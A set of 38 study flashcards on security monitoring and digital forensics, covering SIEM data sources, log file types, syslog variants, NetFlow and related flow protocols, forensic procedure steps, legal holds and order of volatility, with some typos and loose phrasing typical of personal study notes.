Forensics Flashcards

1
Q

How do items get into the SIEM

A

Sensors
Sensitivity
Trends
Alerts
Correlation
Log Files

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Describe the sensors that feed data into a SEIM

A

The endpoint being monitored feeds sata to the SEIM

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Describe sensitivity as it relates to a SEIM

A

How much or how little we are logging and how sensos are configured to determine how much data is passed

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Describe Trends as they relate to SEIM

A

SEIM identifies trends in the network as data is fed to the SIEM, for example, failed login attempts accross many user accounts may be brute force

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

How are alerts created in a SIEM

A

Created in the SIEM based on certaim parameters, such as account lock outs, failed password attempts

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Describe correlation of SIEM data

A

Ensuring that endpoints are using standardized IP and hostname formatting, and devices are using UTC

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Describe log files as they related to SIEMS

A

Files that record etiehr events that occur in an OS or other software that is being run, or message between users for COMMS software

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What are the types of log files

A

System
Application
Security
web
DNS
Authentication
DumpFiles
VOIP

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Describe what system, application, and security log files provide

A

System - What is occuring on host or server
Application - what each app is doing
Security- monitor log in events

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Describe what web log files provide

A

Web - may be a proxy server that will detail what websites users are visiting, and if you host a web server, these logs will tell you what files and hosted items are being interacted with

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Describe what DNS, and authentication files provide

A

DNS - What requests have been made of the DNS server, see what host is asking for what address

Authentication - will show all authentication info across files, systems, resources

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Describe what DumpFiles and VOIP logs are used for

A

Dump Files are logged when things crash, memory contents are written to disk for later review

VOIP logs can be captured as VOIP metadata

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

What are the three variations of SYSLOG

A

Syslog, rsyslog, syslog-ng

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Which versions of SYSLOG offer encryption

A

Syslog-NG

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is JournalCTL

A

LInux CMD utility used for querying and displaying logs from JournalD, the systemD logging service in Linux

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is NXLog

A

Multiplatform log management tool that helps to identify security risks and policy breaches and analyze operational problems in server, OS, and application Logs

Open source, cross platform tool similar to rsyslog and syslog-NG

17
Q

What is Netflow and what data does it collect/display

A

Network protocol developed by Cisco that collects active IP netweork traffice as it flow sin our out of an interface.

It can collect the point of origin, destination, volume and paths on the network that data has.

18
Q

What are some uses of Netflow and it’s limitation

A

It provides a summary of data going in and out of a network, and can display network spikes which can help admins determine who is using the most bandwidth and at which time.

Netflow CANNOT tell exactly what files are leaving or entering the network

19
Q

What is Sflow

A

Sampled Flow provides a means for exporting truncated packets with Interface counters for the purpose of network monitoring

It is an open source version of netflow
It will sample packets using X out of Y method

20
Q

What is IPfix

A

IP Flow info Export - Universal standard for export of IP flow information from network devices and mediation systems such as account/billing systems that facilitate measurement, accounting and billing.

Back end of service management, cell phone and ISPs can use this to determine how much data you have used in a given period, and bill you for what you use.

21
Q

Describe metadata

A

Data about data, could provide an underlying definition or description of underlying data that make finding or working with data easier.

Example:
Files > Created on, Created by
Email > email header

22
Q

Describe forensic procedures

A

Written procedures that ensure that personnel handle forensics properly, effectivity, and in compliance with regulations

23
Q

What are the four steps to forensics

A

Identifications
Collect
Analysis
Reporting

24
Q

Describe Identification and Collection of forensic evidence

A

Identification - Ensure scene is safe and secure to prevent contamination, and identify scope of what evidence is to be collected

Collection - Ensure authorization to collect evidence, document and prove the integrity of the evidence

25
Q

Describe the analysis step of forensics

A

A copy of the evidence is created for analysis and repeatable methods and tools are used to analyze the data

26
Q

Describe the Reporting step of forensics

A

A report is created that detais the methods and tools used in the investigation.

It presents detailed findings and conclusion based on the analysis.

27
Q

What is a legal hold

A

Process designed to preserve all relevant information when litigation is reasonably expected to occur .

A liaison who has legal knowledge and expertise should be appointed and act as a POC for LE

28
Q

What are the ethics that forensic analysts must abide

A
  1. Analysis must be performed without bias
  2. analysis must be repeatable by 3rd party
  3. Evidence must not be changed or manipulated
29
Q

Describe a forensic timeline

A

A tool that shows the sequence of filesystem events within a source image using a graphical format

30
Q

What are some common questions to ask in the analysis stage of an incident response

A

How was access to the system obtained
What tools have been installed - RAT, NMAP
What changes to the files have been made
Was data exfiltrated
What was sensitivity of the data exfiltrated

31
Q

When a disk has been retrieved as evidence, how should the data be handled

A

A forensic disk image of the data should be taken, This will allow for any malware to be removed from the system.

32
Q

What are the first four steps that should be followed after a forensic image has been taken of digital evidence

A
  1. Capture and Hash system images
  2. Analyze data with forensic tools
  3. Capture screenshots of the machine
  4. Review network and traffic logs
33
Q

What are steps 5-9 when analyzing collected data

A
  1. Capture video - CCTV?
  2. Consider order of volatility of data on systems you are collecting data from
  3. take statements
  4. review licensing and documentation
  5. Track man hours and expenses
34
Q

What is order of volatility

A

consideration when collecting digital evidence

  1. CPU Registers and Cache
  2. Contents of RAM, Routing Tables, ARP Cache, Process tables, and swap files
  3. Data on persistent mass storage
  4. remote logging and monitoring data
  5. physical configuration and network topology
  6. Archival Media - backups
35
Q

Define the process of data acquisition

A

The mehtod and tools used to create a forensically sound copy of data from a source device asuch as memory or disk

36
Q

What may complicate data acquisition

A

BYOD - Employees using their personal devices may not allow forensic copies of their personal data to be made and analyzed

37
Q

How does a PCs power state affect data acquistion

A

Some data may only be available while the PC is powered on, other data may require the PC to be turned off, or be collected during a reboot.

38
Q

Where are Windows Reg Keys stored

A

Most are stored on Disk, but HKLM/Hardware are stored in memory, and can be accessed via a memory dump.